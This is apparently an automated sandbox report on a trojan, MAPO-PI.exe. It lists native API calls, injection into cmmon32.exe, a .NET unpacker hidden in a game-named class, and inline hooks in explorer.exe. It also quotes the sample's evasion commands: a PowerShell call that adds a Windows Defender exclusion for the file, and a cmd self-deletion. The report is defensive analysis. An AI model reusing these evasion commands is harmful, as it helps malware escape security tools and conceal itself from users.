Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C8A830 16_2_04C8A830
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C899BF 16_2_04C899BF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C6F900 16_2_04C6F900
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C84120 16_2_04C84120
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D322AE 16_2_04D322AE
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D1FA2B 16_2_04D1FA2B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D2DBD2 16_2_04D2DBD2
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D203DA 16_2_04D203DA
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C9EBB0 16_2_04C9EBB0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C8AB40 16_2_04C8AB40
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D32B28 16_2_04D32B28
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_0304E269 16_2_0304E269
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_0304DA87 16_2_0304DA87
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_0304CF96 16_2_0304CF96
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_03032FB0 16_2_03032FB0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_0304DFFF 16_2_0304DFFF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_03039E2B 16_2_03039E2B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_03039E30 16_2_03039E30
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_03032D90 16_2_03032D90
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_0304D475 16_2_0304D475
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: String function: 04C6B150 appears 66 times
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: String function: 0189B150 appears 133 times
Contains functionality to call native functions
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_00419D50 NtCreateFile, 3_2_00419D50
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_00419E00 NtReadFile, 3_2_00419E00
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_00419E80 NtClose, 3_2_00419E80
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_00419F30 NtAllocateVirtualMemory, 3_2_00419F30
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_00419D4A NtCreateFile, 3_2_00419D4A
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_00419DFB NtReadFile, 3_2_00419DFB
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_00419DA2 NtCreateFile, 3_2_00419DA2
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_00419E7A NtClose, 3_2_00419E7A
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_00419F2D NtAllocateVirtualMemory, 3_2_00419F2D
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018D99A0 NtCreateSection,LdrInitializeThunk, 3_2_018D99A0
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018D9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 3_2_018D9910
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018D98F0 NtReadVirtualMemory,LdrInitializeThunk, 3_2_018D98F0
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018D9840 NtDelayExecution,LdrInitializeThunk, 3_2_018D9840
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018D9860 NtQuerySystemInformation,LdrInitializeThunk, 3_2_018D9860
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018D9A00 NtProtectVirtualMemory,LdrInitializeThunk, 3_2_018D9A00
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018D9A20 NtResumeThread,LdrInitializeThunk, 3_2_018D9A20
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018D9A50 NtCreateFile,LdrInitializeThunk, 3_2_018D9A50
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018D95D0 NtClose,LdrInitializeThunk, 3_2_018D95D0
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018D9540 NtReadFile,LdrInitializeThunk, 3_2_018D9540
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018D9780 NtMapViewOfSection,LdrInitializeThunk, 3_2_018D9780
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018D97A0 NtUnmapViewOfSection,LdrInitializeThunk, 3_2_018D97A0
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018D9710 NtQueryInformationToken,LdrInitializeThunk, 3_2_018D9710
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018D96E0 NtFreeVirtualMemory,LdrInitializeThunk, 3_2_018D96E0
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018D9660 NtAllocateVirtualMemory,LdrInitializeThunk, 3_2_018D9660
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018D99D0 NtCreateProcessEx, 3_2_018D99D0
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018D9950 NtQueueApcThread, 3_2_018D9950
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018D98A0 NtWriteVirtualMemory, 3_2_018D98A0
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018D9820 NtEnumerateKey, 3_2_018D9820
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018DB040 NtSuspendThread, 3_2_018DB040
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018DA3B0 NtGetContextThread, 3_2_018DA3B0
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018D9B00 NtSetValueKey, 3_2_018D9B00
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018D9A80 NtOpenDirectoryObject, 3_2_018D9A80
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018D9A10 NtQuerySection, 3_2_018D9A10
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018D95F0 NtQueryInformationFile, 3_2_018D95F0
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018D9520 NtWaitForSingleObject, 3_2_018D9520
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018DAD30 NtSetContextThread, 3_2_018DAD30
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018D9560 NtWriteFile, 3_2_018D9560
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018D9FE0 NtCreateMutant, 3_2_018D9FE0
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018DA710 NtOpenProcessToken, 3_2_018DA710
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018D9730 NtQueryVirtualMemory, 3_2_018D9730
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018D9760 NtOpenProcess, 3_2_018D9760
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018DA770 NtOpenThread, 3_2_018DA770
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018D9770 NtSetInformationFile, 3_2_018D9770
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018D96D0 NtCreateKey, 3_2_018D96D0
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018D9610 NtEnumerateValueKey, 3_2_018D9610
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018D9650 NtQueryValueKey, 3_2_018D9650
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018D9670 NtQueryInformationProcess, 3_2_018D9670
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CA95D0 NtClose,LdrInitializeThunk, 16_2_04CA95D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CA9540 NtReadFile,LdrInitializeThunk, 16_2_04CA9540
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CA96D0 NtCreateKey,LdrInitializeThunk, 16_2_04CA96D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CA96E0 NtFreeVirtualMemory,LdrInitializeThunk, 16_2_04CA96E0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CA9650 NtQueryValueKey,LdrInitializeThunk, 16_2_04CA9650
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CA9660 NtAllocateVirtualMemory,LdrInitializeThunk, 16_2_04CA9660
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CA9FE0 NtCreateMutant,LdrInitializeThunk, 16_2_04CA9FE0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CA9780 NtMapViewOfSection,LdrInitializeThunk, 16_2_04CA9780
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CA9710 NtQueryInformationToken,LdrInitializeThunk, 16_2_04CA9710
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CA9840 NtDelayExecution,LdrInitializeThunk, 16_2_04CA9840
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CA9860 NtQuerySystemInformation,LdrInitializeThunk, 16_2_04CA9860
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CA99A0 NtCreateSection,LdrInitializeThunk, 16_2_04CA99A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CA9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 16_2_04CA9910
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CA9A50 NtCreateFile,LdrInitializeThunk, 16_2_04CA9A50
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CA95F0 NtQueryInformationFile, 16_2_04CA95F0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CA9560 NtWriteFile, 16_2_04CA9560
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CA9520 NtWaitForSingleObject, 16_2_04CA9520
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CAAD30 NtSetContextThread, 16_2_04CAAD30
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CA9670 NtQueryInformationProcess, 16_2_04CA9670
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CA9610 NtEnumerateValueKey, 16_2_04CA9610
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CA97A0 NtUnmapViewOfSection, 16_2_04CA97A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CA9760 NtOpenProcess, 16_2_04CA9760
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CAA770 NtOpenThread, 16_2_04CAA770
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CA9770 NtSetInformationFile, 16_2_04CA9770
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CAA710 NtOpenProcessToken, 16_2_04CAA710
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CA9730 NtQueryVirtualMemory, 16_2_04CA9730
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CA98F0 NtReadVirtualMemory, 16_2_04CA98F0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CA98A0 NtWriteVirtualMemory, 16_2_04CA98A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CAB040 NtSuspendThread, 16_2_04CAB040
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CA9820 NtEnumerateKey, 16_2_04CA9820
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CA99D0 NtCreateProcessEx, 16_2_04CA99D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CA9950 NtQueueApcThread, 16_2_04CA9950
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CA9A80 NtOpenDirectoryObject, 16_2_04CA9A80
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CA9A00 NtProtectVirtualMemory, 16_2_04CA9A00
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CA9A10 NtQuerySection, 16_2_04CA9A10
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CA9A20 NtResumeThread, 16_2_04CA9A20
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CAA3B0 NtGetContextThread, 16_2_04CAA3B0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CA9B00 NtSetValueKey, 16_2_04CA9B00
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_03049F30 NtAllocateVirtualMemory, 16_2_03049F30
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_03049E00 NtReadFile, 16_2_03049E00
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_03049E80 NtClose, 16_2_03049E80
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_03049D50 NtCreateFile, 16_2_03049D50
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_03049F2D NtAllocateVirtualMemory, 16_2_03049F2D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_03049E7A NtClose, 16_2_03049E7A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_03049D4A NtCreateFile, 16_2_03049D4A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_03049DA2 NtCreateFile, 16_2_03049DA2
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_03049DFB NtReadFile, 16_2_03049DFB
Sample file is different than original file name gathered from version info
Source: MAPO-PI.exe Binary or memory string: OriginalFilename vs MAPO-PI.exe
Source: MAPO-PI.exe, 00000000.00000002.238302616.00000000025B1000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameTaskNode.dll4 vs MAPO-PI.exe
Source: MAPO-PI.exe, 00000000.00000002.237713929.00000000006E0000.00000004.00000020.sdmp Binary or memory string: OriginalFilenameclr.dllT vs MAPO-PI.exe
Source: MAPO-PI.exe, 00000000.00000002.237496370.000000000008A000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameDebugVi.exe< vs MAPO-PI.exe
Source: MAPO-PI.exe Binary or memory string: OriginalFilename vs MAPO-PI.exe
Source: MAPO-PI.exe, 00000003.00000000.232786703.0000000000ECA000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameDebugVi.exe< vs MAPO-PI.exe
Source: MAPO-PI.exe, 00000003.00000002.293450051.0000000001859000.00000040.00020000.sdmp Binary or memory string: OriginalFilenameCMMON32.exe` vs MAPO-PI.exe
Source: MAPO-PI.exe, 00000003.00000002.293616666.000000000198F000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs MAPO-PI.exe
Source: MAPO-PI.exe Binary or memory string: OriginalFilenameDebugVi.exe< vs MAPO-PI.exe
PE file contains strange resources
Source: MAPO-PI.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MAPO-PI.exe Virustotal: Detection: 30%
Source: MAPO-PI.exe ReversingLabs: Detection: 39%
Source: MAPO-PI.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\MAPO-PI.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\MAPO-PI.exe 'C:\Users\user\Desktop\MAPO-PI.exe'
Source: C:\Users\user\Desktop\MAPO-PI.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\MAPO-PI.exe'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\MAPO-PI.exe Process created: C:\Users\user\Desktop\MAPO-PI.exe C:\Users\user\Desktop\MAPO-PI.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
Source: C:\Windows\SysWOW64\cmmon32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\MAPO-PI.exe'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\MAPO-PI.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\MAPO-PI.exe' Jump to behavior
Source: C:\Users\user\Desktop\MAPO-PI.exe Process created: C:\Users\user\Desktop\MAPO-PI.exe C:\Users\user\Desktop\MAPO-PI.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\MAPO-PI.exe' Jump to behavior
Source: C:\Users\user\Desktop\MAPO-PI.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\MAPO-PI.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\MAPO-PI.exe.log Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p05gvjwq.ucq.ps1 Jump to behavior
Source: classification engine Classification label: mal100.troj.evad.winEXE@10/5@3/3
Source: C:\Users\user\Desktop\MAPO-PI.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\MAPO-PI.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: MAPO-PI.exe Joe Sandbox Cloud Basic: Detection: clean Score: 0 Perma Link
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5196:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6084:120:WilError_01
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\MAPO-PI.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: MAPO-PI.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: MAPO-PI.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: cmmon32.pdb source: MAPO-PI.exe, 00000003.00000002.293436175.0000000001850000.00000040.00020000.sdmp
Source: Binary string: cmmon32.pdbGCTL source: MAPO-PI.exe, 00000003.00000002.293436175.0000000001850000.00000040.00020000.sdmp
Source: Binary string: wntdll.pdbUGP source: MAPO-PI.exe, 00000003.00000002.293616666.000000000198F000.00000040.00000001.sdmp, cmmon32.exe, 00000010.00000002.497241388.0000000004C40000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: MAPO-PI.exe, cmmon32.exe

Data Obfuscation:

barindex
.NET source code contains potential unpacker
Source: MAPO-PI.exe, Platformer_AI/GameDisplay.cs .Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 0.2.MAPO-PI.exe.70000.0.unpack, Platformer_AI/GameDisplay.cs .Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 0.0.MAPO-PI.exe.70000.0.unpack, Platformer_AI/GameDisplay.cs .Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 3.0.MAPO-PI.exe.eb0000.3.unpack, Platformer_AI/GameDisplay.cs .Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 3.2.MAPO-PI.exe.eb0000.1.unpack, Platformer_AI/GameDisplay.cs .Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 3.0.MAPO-PI.exe.eb0000.0.unpack, Platformer_AI/GameDisplay.cs .Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 3.0.MAPO-PI.exe.eb0000.9.unpack, Platformer_AI/GameDisplay.cs .Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 3.0.MAPO-PI.exe.eb0000.2.unpack, Platformer_AI/GameDisplay.cs .Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 3.0.MAPO-PI.exe.eb0000.1.unpack, Platformer_AI/GameDisplay.cs .Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 3.0.MAPO-PI.exe.eb0000.7.unpack, Platformer_AI/GameDisplay.cs .Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 3.0.MAPO-PI.exe.eb0000.5.unpack, Platformer_AI/GameDisplay.cs .Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_004170AC push eax; retf 3_2_004170AF
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_00417A47 push edx; ret 3_2_00417A48
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0040ED75 push 00000051h; retf 3_2_0040ED79
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0041CEF2 push eax; ret 3_2_0041CEF8
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0041CEFB push eax; ret 3_2_0041CF62
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0041CEA5 push eax; ret 3_2_0041CEF8
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0041CF5C push eax; ret 3_2_0041CF62
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018ED0D1 push ecx; ret 3_2_018ED0E4
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CBD0D1 push ecx; ret 16_2_04CBD0E4
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_03047A47 push edx; ret 16_2_03047A48
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_030470AC push eax; retf 16_2_030470AF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_0304CF5C push eax; ret 16_2_0304CF62
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_0304CEA5 push eax; ret 16_2_0304CEF8
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_0304CEF2 push eax; ret 16_2_0304CEF8
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_0304CEFB push eax; ret 16_2_0304CF62
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_0303ED75 push 00000051h; retf 16_2_0303ED79

Hooking and other Techniques for Hiding and Protection:

barindex
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8E 0xEE 0xEA
Self deletion via cmd delete
Source: C:\Windows\SysWOW64\cmmon32.exe Process created: /c del 'C:\Users\user\Desktop\MAPO-PI.exe'
Source: C:\Windows\SysWOW64\cmmon32.exe Process created: /c del 'C:\Users\user\Desktop\MAPO-PI.exe' Jump to behavior
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\Desktop\MAPO-PI.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Users\user\Desktop\MAPO-PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MAPO-PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MAPO-PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MAPO-PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MAPO-PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MAPO-PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MAPO-PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MAPO-PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MAPO-PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MAPO-PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MAPO-PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MAPO-PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MAPO-PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MAPO-PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MAPO-PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MAPO-PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MAPO-PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MAPO-PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MAPO-PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MAPO-PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MAPO-PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MAPO-PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MAPO-PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MAPO-PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MAPO-PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MAPO-PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MAPO-PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MAPO-PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MAPO-PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MAPO-PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MAPO-PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\MAPO-PI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
